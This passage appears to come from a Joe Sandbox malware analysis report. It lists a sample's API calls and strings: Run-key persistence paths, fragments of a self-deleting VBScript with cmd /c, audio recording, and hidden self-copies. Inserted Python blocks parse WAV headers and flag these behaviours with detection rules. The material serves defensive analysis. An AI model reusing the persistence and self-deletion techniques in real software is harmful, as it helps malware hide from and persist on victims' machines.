                                        • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                        • Opcode Fuzzy Hash: 5dbcded7602185ea070b480d70fb33acaad7b421ae312c9c840d883bd3e5244d
                                        • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                        APIs
                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                          • Part of subcall function 0041B59F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6B5,00000000,00000000,?), ref: 0041B5DE
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                        • ExitProcess.KERNEL32 ref: 0040C63E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 1861856835-3168347843
                                        • Opcode ID: d104b75ca01019766e4c18ed666eb39b745631fe35c064e3107e8b6117f1f402
                                        • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                                        • Opcode Fuzzy Hash: d104b75ca01019766e4c18ed666eb39b745631fe35c064e3107e8b6117f1f402
                                        • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                                        APIs
                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                        • SetEvent.KERNEL32 ref: 0041A39A
                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                        • CloseHandle.KERNEL32 ref: 0041A3BB
                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                        • String ID: alias audio$" type $TUF$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                        • API String ID: 738084811-2745919808
                                        • Opcode ID: 366dc257e76a7d89ff517ca85c94e996c3be762cdb00e461543f6a6bce535d75
                                        • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                        • Opcode Fuzzy Hash: 366dc257e76a7d89ff517ca85c94e996c3be762cdb00e461543f6a6bce535d75
                                        • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                        • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                        • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                        • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Write$Create
                                        • String ID: RIFF$WAVE$data$fmt
                                        • API String ID: 1602526932-4212202414
                                        • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                        • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                        • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                        • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
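The thirteen WriteFile calls in the record above emit, in order, the fields of the canonical 44-byte RIFF/WAVE header ("RIFF", RIFF size, "WAVE", "fmt ", 16, format tag, channels, sample rate, byte rate, block align, bits per sample, "data", data size). The global addresses 00471B02, 00471B04 and 00471B0E that three of the writes read from are consistent with the nChannels, nSamplesPerSec and wBitsPerSample offsets of a WAVEFORMATEX kept at 00471B00, although the report itself does not show that structure. The parser below is an added example, not code from the sample or from Joe Sandbox: it validates such a header on a recovered output file and reports whether the file is shorter than its header claims; build_wav_header exists only to construct test input.

```python
"""Parse and validate the canonical 44-byte RIFF/WAVE header that the WriteFile
sequence above emits. Added example, not code from the sample or from Joe
Sandbox; build_wav_header only constructs test input."""
import struct

# One field per WriteFile call, in the order the listing shows them:
# "RIFF", riff size, "WAVE", "fmt ", 16, format tag, channels, sample rate,
# byte rate, block align, bits per sample, "data", data size (little-endian).
HEADER = struct.Struct("<4sI4s4sIHHIIHH4sI")  # 44 bytes
WAVE_FORMAT_PCM = 1

def build_wav_header(channels, sample_rate, bits, data_len, fmt_tag=WAVE_FORMAT_PCM):
    """Constructed test input: a self-consistent header for data_len bytes of PCM."""
    block_align = channels * bits // 8
    return HEADER.pack(b"RIFF", 36 + data_len, b"WAVE", b"fmt ", 16, fmt_tag,
                       channels, sample_rate, sample_rate * block_align,
                       block_align, bits, b"data", data_len)

def parse_wav_header(buf):
    """Return the header fields of a recovered file, or raise ValueError.

    'truncated' is True when the buffer is shorter than header + data size,
    i.e. the file was cut off after its header was written."""
    if len(buf) < HEADER.size:
        raise ValueError("buffer shorter than a 44-byte header")
    (riff, riff_size, wave, fmt, fmt_size, tag, channels, rate,
     byte_rate, block_align, bits, data, data_size) = HEADER.unpack_from(buf)
    if (riff, wave, fmt, data) != (b"RIFF", b"WAVE", b"fmt ", b"data"):
        raise ValueError("not a canonical RIFF/WAVE header")
    if fmt_size != 16:
        raise ValueError("fmt chunk size %d: not the 16-byte PCM layout" % fmt_size)
    if channels == 0 or rate == 0 or bits not in (8, 16, 24, 32):
        raise ValueError("implausible channel count, sample rate or sample width")
    # The two derived fields must agree with rate, channels and bits; a header
    # rebuilt by hand or overwritten by another chunk usually fails here.
    if block_align != channels * bits // 8 or byte_rate != rate * block_align:
        raise ValueError("block align / byte rate inconsistent with rate, channels, bits")
    if riff_size != 36 + data_size:
        raise ValueError("RIFF size and data size disagree")
    return {
        "format_tag": tag, "channels": channels, "sample_rate": rate,
        "bits_per_sample": bits, "data_size": data_size,
        "duration_s": data_size / byte_rate,
        "truncated": len(buf) < HEADER.size + data_size,
    }
```

Run it over any file whose first four bytes are "RIFF" in the dropped-files list; a ValueError means the header is not the layout the code above writes, while a "truncated" result means the writer was stopped before the data it announced was flushed.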
                                        APIs
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000001,004068B2,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                        • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                        • API String ID: 1646373207-982034807
                                        • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                        • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                        • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                        • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                        APIs
                                        • _wcslen.LIBCMT ref: 0040BC75
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                        • _wcslen.LIBCMT ref: 0040BD54
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000000,00000000), ref: 0040BDF2
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                        • _wcslen.LIBCMT ref: 0040BE34
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                        • ExitProcess.KERNEL32 ref: 0040BED0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                        • String ID: 6$C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$del$open$BG$BG
                                        • API String ID: 1579085052-151350935
                                        • Opcode ID: 4d244095d4847cbae713d45db5f80276bba3783f73a4fe09937fc6169b27dde8
                                        • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                                        • Opcode Fuzzy Hash: 4d244095d4847cbae713d45db5f80276bba3783f73a4fe09937fc6169b27dde8
                                        • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
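The call listings above encode several distinct behaviours: the Zw*Section names in the first record's String ID; the GetTempPathW/GetTempFileNameW("temp_") file with ".exe" appended and handed to ShellExecuteW, plus the OpenProcess(0x00100000 = SYNCHRONIZE)/WaitForSingleObject wait, in the CreateMutexA record; the update.vbs self-delete script and the Run / Policies\Explorer\Run key paths in the RegDeleteKeyA record; the GetModuleHandleW("ntdll.dll")/GetProcAddress resolution of Nt*, Rtl* and Ldr* routines; and, in the record immediately above, CopyFileW followed by SetFileAttributesW with 7 (READONLY|HIDDEN|SYSTEM) and ShellExecuteW. The script below turns such listings into per-function records and flags each of those patterns. It is an added example, not part of Joe Sandbox or of the analysed sample: the rule names are chosen here, and SAMPLE is a constructed excerpt of the report's own lines with one long path shortened to sample.exe.

```python
"""Behavioural triage over the per-function "APIs" / "String ID" listings of a
Joe Sandbox report. Added example, not part of Joe Sandbox or of the analysed
sample: rule names are chosen here; SAMPLE is a constructed excerpt of the listing."""
import re
from dataclasses import dataclass, field

# "• CreateFileW.KERNEL32(?,80000000), ref: 0041135B" or "• ExitProcess.KERNEL32 ref: 0040C63E"
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
STR_RE = re.compile(r"•\s*String ID:\s*(?P<ids>.*)$")  # values are "$"-separated

@dataclass
class Call:
    api: str
    args: list
    ref: str
    subcall: bool  # True for "Part of subcall function ..." lines

@dataclass
class Function:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)

def parse_report(text):
    """Each 'APIs' header starts a new function record; collect its calls and strings."""
    funcs, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = Function()
            funcs.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(s)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["api"], args, m["ref"], m["sub"] is not None))
        elif (m := STR_RE.match(s)):
            cur.strings.extend(x for x in m["ids"].split("$") if x)
    return funcs

def has(fn, api, pred=lambda c: True):
    return any(c.api == api and pred(c) for c in fn.calls)

def match_rules(fn):
    """Rule names are this example's own; each maps to one call/string pattern in the listing."""
    hits, strs = [], "\n".join(fn.strings)
    # GetTempFileNameW + lstrcatW(".exe") + ShellExecuteW("open"): drop a copy to %TEMP% and run it
    if (has(fn, "GetTempFileNameW") and has(fn, "lstrcatW", lambda c: ".exe" in c.args)
            and has(fn, "ShellExecuteW", lambda c: "open" in c.args)):
        hits.append("drop-to-temp-and-execute")
    # OpenProcess(SYNCHRONIZE = 0x00100000) then WaitForSingleObject: block until another process ends
    if has(fn, "OpenProcess", lambda c: c.args[:1] == ["00100000"]) and has(fn, "WaitForSingleObject"):
        hits.append("wait-for-process-exit")
    # CopyFileW + SetFileAttributesW(..., 7): the installed copy is marked READONLY|HIDDEN|SYSTEM
    if has(fn, "CopyFileW") and has(fn, "SetFileAttributesW", lambda c: c.args[1:2] == ["00000007"]):
        hits.append("hidden-system-install-copy")
    # GetModuleHandleW("ntdll.dll", "Nt*/Zw*/Rtl*/Ldr*") + GetProcAddress: natives resolved at run time
    if has(fn, "GetProcAddress") and has(fn, "GetModuleHandleW", lambda c: c.args[:1] == ["ntdll.dll"]
            and len(c.args) > 1 and re.match(r"(Nt|Zw|Rtl|Ldr)\w+$", c.args[1])):
        hits.append("ntdll-dynamic-resolution")
    if all(s in strs for s in ("ZwCreateSection", "ZwMapViewOfSection", "ZwUnmapViewOfSection")):
        hits.append("section-mapping-api-names")
    if "Scripting.FileSystemObject" in strs and "DeleteFile(Wscript.ScriptFullName)" in strs:
        hits.append("vbscript-self-delete")
    if "CurrentVersion\\Run\\" in strs or "Policies\\Explorer\\Run\\" in strs:
        hits.append("run-key-persistence")
    return hits

def triage(text):
    """[(function_index, first_ref, [rule, ...]), ...] for every function with at least one hit."""
    out = []
    for i, fn in enumerate(parse_report(text)):
        hits = match_rules(fn)
        if hits:
            out.append((i, fn.calls[0].ref if fn.calls else None, hits))
    return out

SAMPLE = r'''
APIs
• OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
• lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
• String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
APIs
• ExitProcess.KERNEL32 ref: 0040C63E
• String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$fso.DeleteFile(Wscript.ScriptFullName)$open
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
• GetProcAddress.KERNEL32(00000000), ref: 00406511
APIs
• CopyFileW.KERNEL32(C:\Users\user\Desktop\sample.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
APIs
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
'''
```

The rules deliberately key on argument values that the report prints literally (the 00100000 access mask, the 00000007 attribute value, the ".exe" and "open" string arguments) rather than on API names alone, since CopyFileW or ShellExecuteW by themselves are unremarkable; when run over the full report text, each hit's first_ref gives the address at which to start reading the disassembly.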
                                        APIs
                                        • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                        • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                        • lstrlenW.KERNEL32(?), ref: 0041B217
                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                        • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                        • _wcslen.LIBCMT ref: 0041B2EB
                                        • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                        • GetLastError.KERNEL32 ref: 0041B323
                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                        • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                        • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                        • GetLastError.KERNEL32 ref: 0041B380
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                        • String ID: ?
                                        • API String ID: 3941738427-1684325040
                                        • Opcode ID: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                        • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                        • Opcode Fuzzy Hash: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                        • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$EnvironmentVariable$_wcschr
                                        • String ID:
                                        • API String ID: 3899193279-0
                                        • Opcode ID: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                        • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                        • Opcode Fuzzy Hash: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                        • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                        • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                        • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                        • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                        • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                        • Sleep.KERNEL32(00000064), ref: 00412060
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
